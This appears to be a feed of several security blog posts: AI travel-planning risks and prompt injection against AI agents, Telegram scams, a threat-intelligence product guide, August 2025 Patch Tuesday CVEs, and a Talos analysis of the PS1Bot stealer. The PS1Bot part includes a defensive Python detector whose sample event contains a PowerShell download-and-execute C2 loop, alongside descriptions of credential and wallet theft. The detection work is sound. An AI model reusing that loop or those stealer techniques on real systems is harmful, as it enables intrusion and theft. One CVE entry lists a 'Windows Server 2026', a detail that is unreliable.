Artificial intelligence is already trying its hand as a travel agent: just ask a chatbot about your chosen destination, and in a couple of seconds you’ll get a full sightseeing itinerary, a list of hotels with good reviews, and even visa tips. And with the help of an AI agent, you can even buy tickets without having to trawl through endless airline websites and flight aggregators. Sounds like a traveler’s dream, but there are downsides. In this post, we look at what to pay attention to when planning a vacation with ChatGPT or another AI assistant.
What could go wrong?
A Kaspersky study reveals that just 28% of AI users trust artificial intelligence to plan their vacations (though 96% of that 28% are satisfied with such AI assistance). Note that chatbots possess no knowledge of their own, but learn from input texts and data, and then formulate the most fitting answer to a question. And AI isn’t immune to serving up inaccurate, outdated, or downright false information. Sure, some chatbots already have an internet search function built in, but infallible fact-checking is still a long way off.
In March 2025, Mark Pollard of Australia was due to fly to Chile to give a lecture. But he was turned away at the check-in desk for not having a visa. Mark had duly consulted ChatGPT about the visa requirements of various Latin American countries, and had blindly trusted its response. Since 2019, however, Australian citizens have needed a visa to visit Chile, but this information was apparently unknown to the neural network. In another case, AI advised a journalist to visit museums that had been wiped out by a forest fire.
Sometimes, even professionals on duty are led astray by bad AI. In 2024, staff at Manila airport tried to stop a passenger boarding a UK-bound flight: she was a UK citizen, but only had her US passport on her at the time. As it turns out, that isn’t grounds to deny boarding a flight to England, but the staff had been misinformed by Google AI Overviews. It took a call to the embassy to resolve the situation.
If you don’t want AI to send you to a closed restaurant or a non-existent landmark, then check the information in real time. Just be aware — and beware — that connecting to public Wi-Fi is always a gamble, with the security of your devices and data at stake. When abroad, it’s much safer to use mobile internet. There’s no need to buy a physical SIM card — just use an eSIM.
Why you shouldn’t share personal data with AI
Most popular AIs, like ChatGPT and Gemini, process and store all user requests. This means that in the event of a bug or major leak, outsiders could find out too much about you: travel dates, schedule, budget, and traveling companions. So only share with neural networks data that you wouldn’t mind the whole world knowing.
Many companies these days offer AI agents — digital assistants that can autonomously perform tasks on your behalf. For example, you can ask an AI agent to book a tour, and email your colleagues about your upcoming vacation (please don’t give AI agents access to work chats and email!). Once instructed, the AI agent either launches a virtual machine or captures your computer screen and connects to third-party services.
The problem is that you risk giving the neural network not only your personal data, but also the freedom to perform unwanted actions on websites. Recall that AI agents are vulnerable to prompt injection attacks — hidden commands that attackers plant on phishing pages and hacked websites. Spotting these on your own is near impossible: prompt injections are usually embedded in a website’s metadata or visual elements.
For now at least, the safest way to plan vacation travel is to do your own research and buy everything you need yourself — using AI only as an auxiliary tool. And to minimize the risks associated with prompt injections, use a reliable security solution that blocks all attempts to infect your device with malware.
Always double-check information supplied by AI — a manual search is always best.
Be careful with AI agents: they’re prone to prompt injections, and may leak your data to attackers — or worse.
Bear in mind that public Wi-Fi in airports, hotels, and cafes isn’t secure: traffic isn’t protected, and attackers can snoop on your data. When on the road, it’s better to use an eSIM for mobile internet.
How AI can help plan your vacation | Kaspersky official blog (admin, 2025-08-14 10:06:56)
As we highlighted in our article on building threat resilience in enterprises, one of the key challenges facing CISOs is ensuring proactive security. Reacting to incidents is no longer enough; you need to anticipate upcoming threats.
To achieve this, your team needs powerful solutions that meet your criteria and deliver fast results. Explore our step-by-step guide on integrating threat intelligence into your workflow with ANY.RUN’s TI Lookup and TI Feeds, solutions trusted by 15,000+ organizations across diverse industries.
Find a Source for Intel That Fits Your SOC
TI Feeds are filtered to remove false positives and updated every two hours, ensuring fresh, extensive, and trustworthy data
Threat intelligence is a crucial component of modern SOC operations. Implementing it increases threat detection rates, speeds up incident response, and strengthens overall defense against emerging threats.
When choosing a threat intel solution, prioritize reliability of data, rich context that comes with indicators, and constant updates that will keep you on top of things.
Being an enterprise-grade service, Threat Intelligence Feeds meets these standards. It delivers fast, fresh intelligence gained from threat investigations by 15,000 SOC teams. Each indicator, be that an IP, domain, or URL, is linked to ANY.RUN’s Interactive Sandbox analysis of the malware, enabling you to observe its impact, activities, and overall context in one click.
Not only SOC teams, but also MSSPs and DFIR specialists can use TI Feeds to improve their workflow
Enrich your SIEM, TIP, or XDR system with TI Feeds for:
Expanded Coverage: ANY.RUN’s exclusive IOCs come from Memory Dumps, Suricata IDS, in-browser data, and internal threat categorization systems, increasing the chance of detection of the most evasive threats.
Reduced Workload: The indicators are pre-processed to avoid false positives and ready to be used for malware analysis or incident investigation.
Informed Response: Rich metadata provided for IOCs gives you the context for in-depth threat investigations and faster response.
Create compound queries to retrieve data you need in ANY.RUN’s TI Lookup
Steady monitoring and expanded threat coverage provided by solutions like TI Feeds are important for maintaining a robust defense system. The next challenge is finding a way to browse, identify, and enrich indicators quickly.
In other words, you need targeted, fast access to threat intelligence, for both proactive threat hunting and swift incident response. That’s just what Threat Intelligence Lookup provides. For analysts, it’s like a fishing rod with which they can catch exactly what they’re looking for in the sea of extensive data on threats: for example, quick verdicts on suspicious IPs or additional info on malicious indicators.
Equipping your team with TI Lookup means that your SOC will reach:
Faster Triage and Data-Fueled Response: Check any indicator in seconds, identify malicious activity, and enrich it with more info.
Higher Expertise Levels: Your team members can explore actual attacks, see how they unfold and what TTPs are in use, gaining insights into modern malware.
Improved Proactive Defense: Use intel to develop new SIEM, IDS/IPS, or EDR rules for acting in advance.
Even the free version of TI Lookup makes it possible to achieve these results.
Enrich IOCs with live attack data from threat analyses across 15K SOCs
To conduct private analyses, gain three times more info on threats, and integrate TI Lookup into your system, choose the Premium plan and:
Hunt Threats with Precision: Create and explore custom YARA rules in ANY.RUN’s database to detect malware patterns.
Reduce Risks of Breaches: Fast and accurate access to intelligence is a game-changer for alert triage and incident response, minimizing the likelihood of successful attacks.
Track Malware Trends: See Threat Intelligence Reports written by expert analysts and stay informed on latest industry-wide attacks.
As a result, every stage of SOC operations will become sharper, faster, and more strategic.
Make Threat Intelligence a Part of Your Infrastructure
ANY.RUN app for IBM QRadar SOAR
For teams, it’s more effective to use flexible services available for integration, rather than standalone solutions. That’s how you create a coordinated, resource-efficient defense system.
ANY.RUN offers wide opportunities for integration, including an API and SDK, as well as compatibility with a majority of vendors, such as IBM QRadar, ThreatConnect, and OpenCTI.
Automate Threat Monitoring: Connecting TI solutions to your SIEM, TIP, or SOAR system results in accelerated, more efficient workflow.
Expand Threat Coverage: For centralized protection, TI Feeds offer a continuously updated stream of fresh intel available in STIX/TAXII and MISP formats.
Improved Detection Rate: Turn to TI Lookup to increase your detection capabilities, correlate indicators from over 15,000 global attacks for early detection, and enrich your threat investigations.
No Alert Overload: Reduce the workload of Tier 2 and 3 specialists, empowering Tier 1 analysts to make informed decisions based on actionable and reliable threat intelligence.
Use Cases: Applying This Strategy In Real Life
Implementing threat intelligence into your security operations doesn’t mean increasing workload. It’s actually the opposite. Here are three real-world use cases explaining how quality TI solutions can address common SOC challenges.
Improving Speed and Confidence for Incident Response
The right solution can make a huge impact for your SOC team. It enables analysts to handle incidents faster and with more confidence, boosting overall efficiency.
For example, analysts can use TI Lookup for a quick check of an indicator. Enter a simple query:
Overview of the query results in TI Lookup, indicating malicious activity
And within seconds, you’ll know that this domain is malicious. The next step doesn’t take much either: click one of the linked analyses and you’ll see exactly how the malware behaves and which processes it affects.
You can see analyses of samples that match your TI Lookup query within ANY.RUN Sandbox
And finally, block this threat—and the incident is solved. That’s how you make informed decisions effortlessly and quickly: you just need to know where to find data.
Increase Detection Rate
Another use case for TI Lookup is reviewing alert backlog data, where evasive threats might be hidden. Instead of spending time on manual research, you quickly check any suspicious fragment, such as a command line:
And you’ll find out whether it was a false alarm. In this case, it wasn’t. The command line is actually related to steganography attacks spread by AsyncRAT:
TI Lookup returns over 400 analyses of malicious samples associated with this command line
From here, go to sandbox analysis sessions to see how malware detonates, and collect data to take further informed action. As a result, an attack that could’ve remained in your systems for months is prevented.
Ensure Proactive Defense to Prevent Breaches
A key aspect of proactive defense is staying alert and continuously monitoring the threat landscape. Once you know what’s going on in your industry or other sectors, you should keep an eye on the malware in question, track how it evolves, and watch for new data on it.
For that, use the Query Updates feature in TI Lookup. Click the bell icon when doing a search to subscribe to your query. For example, if you need to access domains related to Lumma specifically, use this line:
Overview of TI Lookup results for Lumma-associated domains
Activate Query Updates:
Click Subscribe to stay alert for new results that match your query
And from now on, you’ll be notified on all new instances for proactive blocking of evolving threats.
About ANY.RUN
Over 500,000 cybersecurity professionals and 15,000+ companies in finance, manufacturing, healthcare, and other sectors rely on ANY.RUN to streamline malware investigations worldwide.
Speed up triage and response by detonating suspicious files in ANY.RUN’s Interactive Sandbox, observing malicious behavior in real time, and gathering insights for faster, more confident security decisions. Paired with Threat Intelligence Lookup and Threat Intelligence Feeds, it provides actionable data on cyberattacks to improve detection and deepen your understanding of evolving threats.
Bridging the Threat Intelligence Gap in Your SOC: A Guide for Security Leaders (admin, 2025-08-13 12:06:46)
Remember the early days of the internet and 419 (aka “Nigerian prince”) scams promising mountains of gold just for you? That era is thankfully over, but today a new curse is all the rage: messenger phishing. Due to its vast user base, the openness of its API, and support for crypto payments, one particular messenger — Telegram — has become a very popular choice for phishing cybercriminals. So what new tricks do Telegram scammers employ, and how can you spot them in time?
Telegram bots in the service of cybercriminals
Telegram is home to a huge array of bot-related scams. And sometimes attackers offer their bots to other bad guys to create new ones. If you’re feeling a bit overwhelmed, don’t worry: our Securelist blogpost takes a detailed look at this phenomenon — known as phishing-as-a-service.
Attackers often use Telegram bots instead of websites. It’s much easier to lure potential victims this way; it’s far harder to create and maintain a full-fledged phishing site and get victims to swallow the bait. With bots, everything’s simpler since users don’t need to leave Telegram, which many mistakenly think is a safe environment by default.
So what does it look like in practice? One example is a new scam involving cryptocurrency investments: “We’re handing out a new token to everyone — just enter the bot and go through KYC verification”. Of course, “KYC verification” for scammers doesn’t mean a passport photo or a video call to confirm your identity, but depositing a sum of cryptocurrency. And, yes, this crypto goes straight into the attackers’ account, while you get zilch.
Telegram bot offers fake KYC verification
Sure, Telegram bots aren’t limited to extracting crypto. For instance, we uncovered a scam inviting victims to get paid for watching short videos. Where? In a Telegram bot, of course.
Victims “earn” two euros per video view
Telegram bots are highly intrusive — if you don’t block them, they’ll keep knocking on your door. Most phishing sites don’t do this; user interaction with them plays out differently: visit the site, browse, leave. But chat with a Telegram bot just once, and it’ll bombard you with suspicious links or pester you for access to manage your channels and groups. If you grow tired of an intrusive bot, just block it: open a dialog with the bot, tap its name, then select Block. That done, the pesky bot will message you no more.
In another nasty bot-related scam, attackers persuade victims to start bot chats, then share their data or send money. Once the victim is hooked, the scammers rename the bot Telegram Wallet or Support Bot (mimicking supposedly official channels), transfer ownership of the bot to the victim’s account without their knowledge, and report it to Telegram support. Thinking it was the victim who created the bot, Telegram support deletes not only the bot, but also the victim’s account. The scammers do this to cover their tracks and muddy the waters for a possible police investigation.
Fake gifts and account theft
Attackers employ a variety of tricks to gain access to victims’ accounts. One of the most common scams is a “gift” subscription to Telegram Premium. Check out our post You’ve been sent a “gift” — a Telegram Premium subscription for details. In brief: scammers message victims from the hacked account of a friend, prompting them to go to a phishing site to “finalize the subscription”. There’s no subscription, of course. Instead, victims have their own accounts stolen.
Another new vector of fraud involves Telegraph, Telegram’s tool for posting longer texts. Anyone can publish content there, and no prior registration is required, which is what attackers exploit since it’s easy to redirect users to phishing pages. The result, as a rule, is one more hijacked account.
The user is lured into following the link to view the full version of the document
What else have scammers and phishers come up with? Threat actors are actively using AI to create deepfakes, steal biometric data, hide phishing attacks under temporary Blob URLs, and even spoof Google Translate subdomains. Read about these and other trends in our Securelist report.
How to guard against Telegram scams and phishing
The best tip is to apply critical thinking at all times. But even the smartest of us can sometimes act rashly, so try to read up on scams as much as possible so that your muscle memory automatically triggers the right response.
Don’t follow links sent by people you barely know. Don’t follow such links even if they promise a juicy gift, and never enter personal data on sites they point to.
Configure privacy and security in your Telegram account. See our in-depth how-to on two-factor authentication and secret chats.
Don’t share one-time codes or passwords with anyone. And don’t enter them anywhere except in the official Telegram app. Scammers know how to trick users into revealing their OTPs.
Use reliable protection that knows phishing when it sees it and warns you about it.
Block intrusive bots. As we said, they’ll keep on knocking, so if after one chat with a Telegram bot you’re sure that’s enough, feel free to block it.
Set up automatic termination of all inactive Telegram sessions every week. In Telegram, go to Settings, then select Devices → Automatically terminate sessions → If inactive for → 1 week.
If your Telegram account is already hacked, read our post What to do if your Telegram account is hacked. Time is of the essence — it’s easier to restore access in the first 24 hours after an attack. And subscribe to our Telegram channel for the inside track on new cybersecurity trends.
Telegram scams in 2025 | Kaspersky official blog (admin, 2025-08-13 12:06:45)
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.
In this month’s release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out of 13 “critical” entries, 9 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including the Windows kernel, Microsoft Message Queuing (MSMQ), Windows Hyper-V, Microsoft Office and GDI+.
CVE-2025-50176 is an RCE vulnerability in DirectX Graphics Kernel given a CVSS 3.1 score of 7.8, where access of resource using incompatible type (‘type confusion’) in Graphics Kernel allows an authorized attacker to execute code locally. Microsoft has noted that this vulnerability affects different versions of Windows 11, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-50177 is an RCE vulnerability in the Microsoft Message Queuing (MSMQ) service, given a CVSS score of 8.1, where a use-after-free vulnerability allows an unauthorized attacker to execute code over a network. To exploit this vulnerability, an attacker would need to send a series of specially crafted MSMQ packets in a rapid sequence over HTTP to an MSMQ server. Microsoft assessed that the attack complexity is “high”, and that exploitation is “more likely”.
CVE-2025-53778 is a Windows NTLM elevation of privilege vulnerability given a CVSS 3.1 base score of 8.8, where improper authentication in Windows NTLM allows an authorized attacker to elevate privileges over a network; an attacker who successfully exploits this vulnerability gains SYSTEM privileges. Microsoft has noted that this vulnerability affects different versions of Windows 10, Windows 11, Windows Server 2008, Windows Server 2012, Windows Server 2026, Windows Server 2019, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-53781 is an information disclosure vulnerability in Windows Hyper-V given a CVSS 3.1 base score of 7.7, where an authorized attacker may be able to disclose sensitive information over a network. Microsoft has noted that this vulnerability affects Windows Server 2025 with the attack complexity assessed as “low” and that exploitation as “less likely”.
CVE-2025-53733 is a remote code execution vulnerability in Microsoft Word given a CVSS 3.1 base score of 8.4 where an incorrect conversion between numeric types in Microsoft Office Word allows an unauthorized attacker to execute code locally. Microsoft has noted that this vulnerability affects Word 2016, Microsoft SharePoint Server 2019, Microsoft SharePoint Enterprise Server 2016, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53740 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4 where a use after free condition allows an unauthorized attacker to execute code locally using a Preview Pane as the attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019, Microsoft Office LTSC 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53766 is a remote code execution vulnerability in GDI+, a Windows graphics subsystem providing a set of features for rendering 2D graphics, images, and text, given a CVSS 3.1 base score of 9.8 where a heap-based buffer overflow allows an unauthorized attacker to execute code over a network. An attacker could trigger this vulnerability by convincing a victim to download and open a document that contains a specially crafted metafile. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server 2008. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-50165 is another remote code execution vulnerability in the Windows graphics component. It was also given a CVSS 3.1 base score of 9.8, where an untrusted pointer dereference allows an unauthorized attacker to execute code over a network without any user intervention. The flaw is an uninitialized function pointer that is called when decoding a JPEG image, which can be embedded in Office and third-party documents/files. This vulnerability affects Windows 11 24H2 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-49707 is a spoofing vulnerability in the Windows Hyper-V hypervisor affecting Azure, given a CVSS 3.1 base score of 7.9, where improper access control may allow an attacker to perform spoofing locally. To exploit this vulnerability, an attacker could obtain a valid certificate after a system reboot, which could then be used to access sensitive information, bypassing security measures and allowing an attacker with access to a confidential VM to impersonate its identity in communications with external systems. Microsoft has noted that this vulnerability affects the NCCadsH100v5-series, ECesv5-series, ECedsv5-series, ECasv5-series, ECadsv5-series, DCesv5-series, DCedsv5-series, DCasv5-series and DCadsv5-series of Azure VMs. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-48807 is a remote code execution vulnerability in the Windows Hyper-V hypervisor, given a CVSS 3.1 base score of 7.5, where improper restriction of communication channels to intended endpoints may allow an attacker executing code locally in a nested guest VM to escape that VM and gain admin privileges on the guest VM that is serving as its host. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server VMs. Microsoft assessed that the attack complexity is “high”, and that exploitation is “less likely”.
CVE-2025-53731 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office 2019, Microsoft Office 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53784 is a remote code execution vulnerability affecting Microsoft Word, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53793 is an information disclosure vulnerability in Microsoft Azure Stack Hub, which may allow an attacker to disclose system internal configuration information over the network. It was given a CVSS 3.1 base score of 7.5 and affects Azure Stack Hub 2501, Azure Stack Hub 2406 and Azure Stack Hub 2408. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services, CVE-2025-53767, CVE-2025-53774, CVE-2025-53787 and CVE-2025-53792. While the CVSS base score for some of them is high, Microsoft has noted that no customer actions are required to resolve the issues.
Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that their exploitation is “more likely:”
CVE-2025-53786: Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability
CVE-2025-49743: Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2025-50167: Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2025-50168: Win32k Elevation of Privilege Vulnerability
CVE-2025-53132: Win32k Elevation of Privilege Vulnerability
CVE-2025-53147: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2025-53156: Windows Storage Port Driver Information Disclosure Vulnerability
CVE-2025-49712: Microsoft SharePoint Remote Code Execution Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65234-65237, 65240-65247.
The following Snort 3 rules are also available: 301300, 301301, 30304-30306, 65240, 65241.
Microsoft Patch Tuesday for August 2025 — Snort rules and prominent vulnerabilities (admin, 2025-08-12 20:06:41)
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”
PS1Bot features a modular design, with several delivered modules used to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.
PS1Bot has been designed with stealth in mind, minimizing persistent artifacts left on infected systems and incorporating in-memory execution techniques to facilitate execution of follow-on modules without requiring them to be written to disk.
PS1Bot distribution campaigns have been extremely active since early 2025, with new samples being observed frequently throughout the year.
The information stealer module implementation leverages wordlists embedded into the stealer to enumerate files containing passwords and seed phrases that can be used to access cryptocurrency wallets, which the stealer also attempts to exfiltrate from infected systems.
Campaign Overview
Cisco Talos has been monitoring an ongoing malware campaign that has been active throughout 2025. The campaign appears to be leveraging malvertising to direct victims to a multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules including an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in-memory, without requiring them to be written to disk. Due to similarities in the design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”
This campaign has been extremely active, with new samples being observed continuously over the past several months. The cluster of malicious activity associated with this campaign also overlaps with prior reporting, including reporting on Skitnet. While Talos has not observed delivery of the Skitnet binary in any of the infection chains we analyzed, the PowerShell implementation described in that reporting appears to match the components delivered throughout the infection chain in this case as well. We have also observed significant overlap in the C2 infrastructure used in both cases. Likewise, we have observed code and indicator overlap with previously reported malvertising campaigns.
Delivery
The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns:
chapter 8 medicare benefit policy manual.zip
Counting Canadian Money Worksheets Pdf.zip.e49
zebra gx430t manual.zip.081
kosher food list pdf (1).zip.c9a
pambu panchangam 2024-25 pdf.zip.a7a
Prior reporting on social media further strengthens this assessment, where researchers have observed the malvertising campaigns leading to the compressed archives delivered in this campaign.
Inside the compressed archive is a single file called “FULL DOCUMENT.js” that functions as a downloader, retrieving the next stage of the infection. In the cases analyzed, the JS file contained VBScript, which employed a variety of obfuscation methods throughout 2025. Below is one of the simpler examples observed recently.
Figure 1. Deobfuscating the downloader script.
Stage 1 retrieval
When executed, the malware retrieves a JScript scriptlet from an attacker-controlled server, the contents of which are then executed.
Figure 2. Example JScript scriptlet contents.
This script is responsible for performing the environmental setup needed for subsequent malware operations to function properly. This includes writing a PowerShell script to C:\ProgramData (ntu.ps1 in this case) and then executing that script; its contents are redacted for space in the previous screenshot. This PowerShell script obtains the serial number of the C: drive and uses it to construct a URL, which it uses to attempt to establish a connection to the command and control (C2) server to retrieve additional malicious content to execute. Any PowerShell content received is then passed to Invoke-Expression (IEX) and executed within the existing PowerShell process. This is repeated in a loop with Sleep() delays added between each iteration.
Figure 3. PowerShell module retrieval and C2 polling.
This allows the malware to continue to run, periodically attempting to poll the attacker’s C2 server to retrieve additional commands to execute within the PowerShell process running on the system. We have observed this technique used to deliver a variety of additional modules, each enabling the attacker to conduct additional operations on the system, obtain additional environmental information about systems under their control, and enable the theft of sensitive information such as credentials, session tokens and financial account details (cryptocurrency wallet data).
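As an added example (not code from the Talos report), the following Python heuristic scores PowerShell script block logging text for the polling-loop traits described above; the feature weights, the threshold and the sample event records are constructed for illustration.

```python
"""Heuristic triage of PowerShell ScriptBlock logging text (Event ID 4104) for the
PS1Bot-style C2 polling loop: read the C: drive serial number, build a URL from it,
fetch remote content, hand it to Invoke-Expression, sleep, repeat.
Added example, not Talos code.  Feature weights, the threshold and the sample
event records below are constructed for illustration."""
import re
from typing import Dict, List

# (feature name, pattern, weight).  Weights are an assumption for this example:
# IEX of fetched content carries the most signal, the loop and sleep the least.
FEATURES = [
    ("drive_serial", re.compile(r"(?i)VolumeSerialNumber|Win32_LogicalDisk|Get-Volume|\bvol\s+c:"), 2),
    ("web_fetch", re.compile(r"(?i)DownloadString|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|\biwr\b|\birm\b"), 2),
    ("iex", re.compile(r"(?i)Invoke-Expression|\biex\b"), 3),
    ("sleep", re.compile(r"(?i)Start-Sleep|\bsleep\b"), 1),
    ("loop", re.compile(r"(?i)\bwhile\s*\(|\bfor\s*\(|\bdo\s*\{"), 1),
]
# 7 = serial + fetch + IEX, or fetch + IEX + loop + sleep; a lone one-shot "fetch | iex" stays below.
THRESHOLD = 7


def score_script_block(text: str) -> Dict[str, object]:
    """Return the matched features, the summed weight and whether it crosses the threshold."""
    hits = [name for name, pattern, _ in FEATURES if pattern.search(text)]
    score = sum(weight for name, _, weight in FEATURES if name in hits)
    return {"score": score, "features": hits, "alert": score >= THRESHOLD}


def triage(events: List[Dict[str, object]]) -> List[int]:
    """Return the ids of events whose ScriptBlockText crosses the threshold."""
    return [int(e["id"]) for e in events
            if score_script_block(str(e["ScriptBlockText"]))["alert"]]


# Constructed sample records in the shape of exported 4104 events; hosts are .invalid.
SAMPLE_EVENTS = [
    # the loop the report describes: serial-derived URL, fetch, IEX, sleep, repeat
    {"id": 1, "ScriptBlockText": (
        "$d = Get-WmiObject Win32_LogicalDisk -Filter \"DeviceID='C:'\"\n"
        "$u = 'http://c2.invalid/' + $d.VolumeSerialNumber\n"
        "while ($true) { IEX ((New-Object Net.WebClient).DownloadString($u)); Start-Sleep -Seconds 60 }")},
    # benign inventory script: reads volume data, no fetch, no IEX
    {"id": 2, "ScriptBlockText": "Get-Volume -DriveLetter C | Select-Object UniqueId, Size\nStart-Sleep -Seconds 1"},
    # benign download to disk: fetch without execution
    {"id": 3, "ScriptBlockText": "Invoke-WebRequest -Uri 'https://updates.example.invalid/policy.json' -OutFile \"$env:TEMP\\policy.json\""},
    # one-shot fetch-and-execute: worth a look, but not the PS1Bot loop
    {"id": 4, "ScriptBlockText": "Invoke-Expression (Invoke-RestMethod -Uri 'https://cfg.example.invalid/init.ps1')"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["id"], score_script_block(str(event["ScriptBlockText"])))
    print("alerts:", triage(SAMPLE_EVENTS))  # alerts: [1]
```

Event 4 scores below the threshold by design; a hunt that also wants one-shot fetch-and-execute blocks would lower THRESHOLD to 5.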
PowerShell modules
We have observed the delivery of the following types of PowerShell modules during and after the initial infection process. Each module is responsible for carrying out its respective task, and several rely on delivery of C# classes that are dynamically compiled to generate assembly DLLs and executed to assist with collection of survey information, keylogging, and screenshot capture.
Antivirus detection
Screen capture
Wallet grabber
Keylogger
Information collection
Persistence
In most of the modules analyzed, logging functionality has been built in to allow the attacker to monitor the installation and runtime status during and post-deployment. In most cases, these status updates are delivered to the C2 server in the form of URL parameters that are included as part of HTTP GET requests to the URL used to establish an initial C2 connection.
We assess with high confidence that additional modules likely exist and are deployable as desired by the adversary. The modular nature of the implementation of this malware provides flexibility and enables the rapid deployment of updates or new functionality as needed. While analyzing activity associated with PS1Bot throughout 2025, we have observed development activities occurring over time, indicating that this is a rapidly evolving threat.
Antivirus detection
This PowerShell module is delivered after initial C2 establishment and is responsible for obtaining and reporting the antivirus programs present on the infected system. This is accomplished by querying Windows Management Instrumentation (WMI) to obtain a list of installed antivirus products.
Figure 4. Antivirus detection logic.
The returned product list is then transmitted to the attacker via an HTTP GET request containing the results of the operation as URL parameters.
Figure 5. Status logging implementation.
The following is an example of the URL structure used to transmit the information to the C2 server:
Once this is completed, execution is passed back to the main PowerShell script and C2 beaconing continues until additional instructions are received. In several cases, we have observed the delivery of multiple distinct PowerShell scripts during the infection process. To facilitate delivery of new PowerShell scripts, the attacker simply manipulates the response content associated with the C2 URL derived initially. Each time the infected system beacons to the C2 server, any delivered PowerShell is dynamically passed to IEX and executed.
Screen capture
Once antivirus detection has been performed, we have observed the delivery of additional PowerShell modules, one of which is used to capture screenshots on infected systems and transmit the resulting images to the C2 server. Attackers typically do this for a variety of reasons, including to identify when a system is in active use by the victim versus unattended, or to collect sensitive information that is displayed on screen but not otherwise stored in a form that is easy to exfiltrate.
In this case, the adversary is using PowerShell to dynamically compile and execute a C# assembly DLL at runtime.
Figure 6. Example use of Add-Type for C# compilation.
The resulting DLL is then used to capture the screenshot and create a Bitmap image (.BMP) inside of the %TEMP% directory. The image is later converted and stored as a JPEG at %APPDATA%\Screenshot.jpg.
Figure 7. Screenshot generation logic.
The content stored within the image file is then Base64 encoded and the resulting data is transmitted to C2. The image files in both %TEMP% and %APPDATA% are also deleted.
Figure 8. Example HTTP POST containing Base64 encoded screenshot image file.
Additionally, status logging messages are sent to inform the attacker of the module’s progress, an example of which is shown below.
Wallet grabber
Following successful collection of screenshots on infected systems, we have observed the delivery of an additional PowerShell module that the attacker refers to as the “grabber module” that is used to steal sensitive data from infected systems. It is designed to target the following types of data that are then exfiltrated to the C2 server:
Local browser storage (stored credentials, cookies, etc.)
Browser extension data for cryptocurrency-related extensions like wallets
Local application data for cryptocurrency wallet applications
Files containing passwords, sensitive strings or wallet seed phrases
The module begins by checking the values of variables that were declared in earlier stages of the infection process. If the script is not being executed within the context of the PowerShell process established earlier, it will fail and terminate execution.
Next, it begins transmitting status logging messages to the C2 server via HTTP GET requests to inform the attacker that the grabber module is running and to provide basic runtime information. Log messages are periodically transmitted during the execution of this module to provide ongoing status updates, error alerting and other relevant information throughout the execution process.
The malware then checks for the existence of various installed applications of interest, including browsers, browser extensions and cryptocurrency wallet applications. If found, the application data is copied to %TEMP% for staging.
The malware specifically checks for the existence of application data associated with the following web browsers:
Google Chrome
Chromium
Kometa
Microsoft Edge
7Star
Maxthon
Opera
Atom
Mustang
Opera GFX
AVG Secure Browser
Netbox Browser
Brave
Avast Secure Browser
Orbitum
Vivaldi
CCleaner Browser
QQ Browser
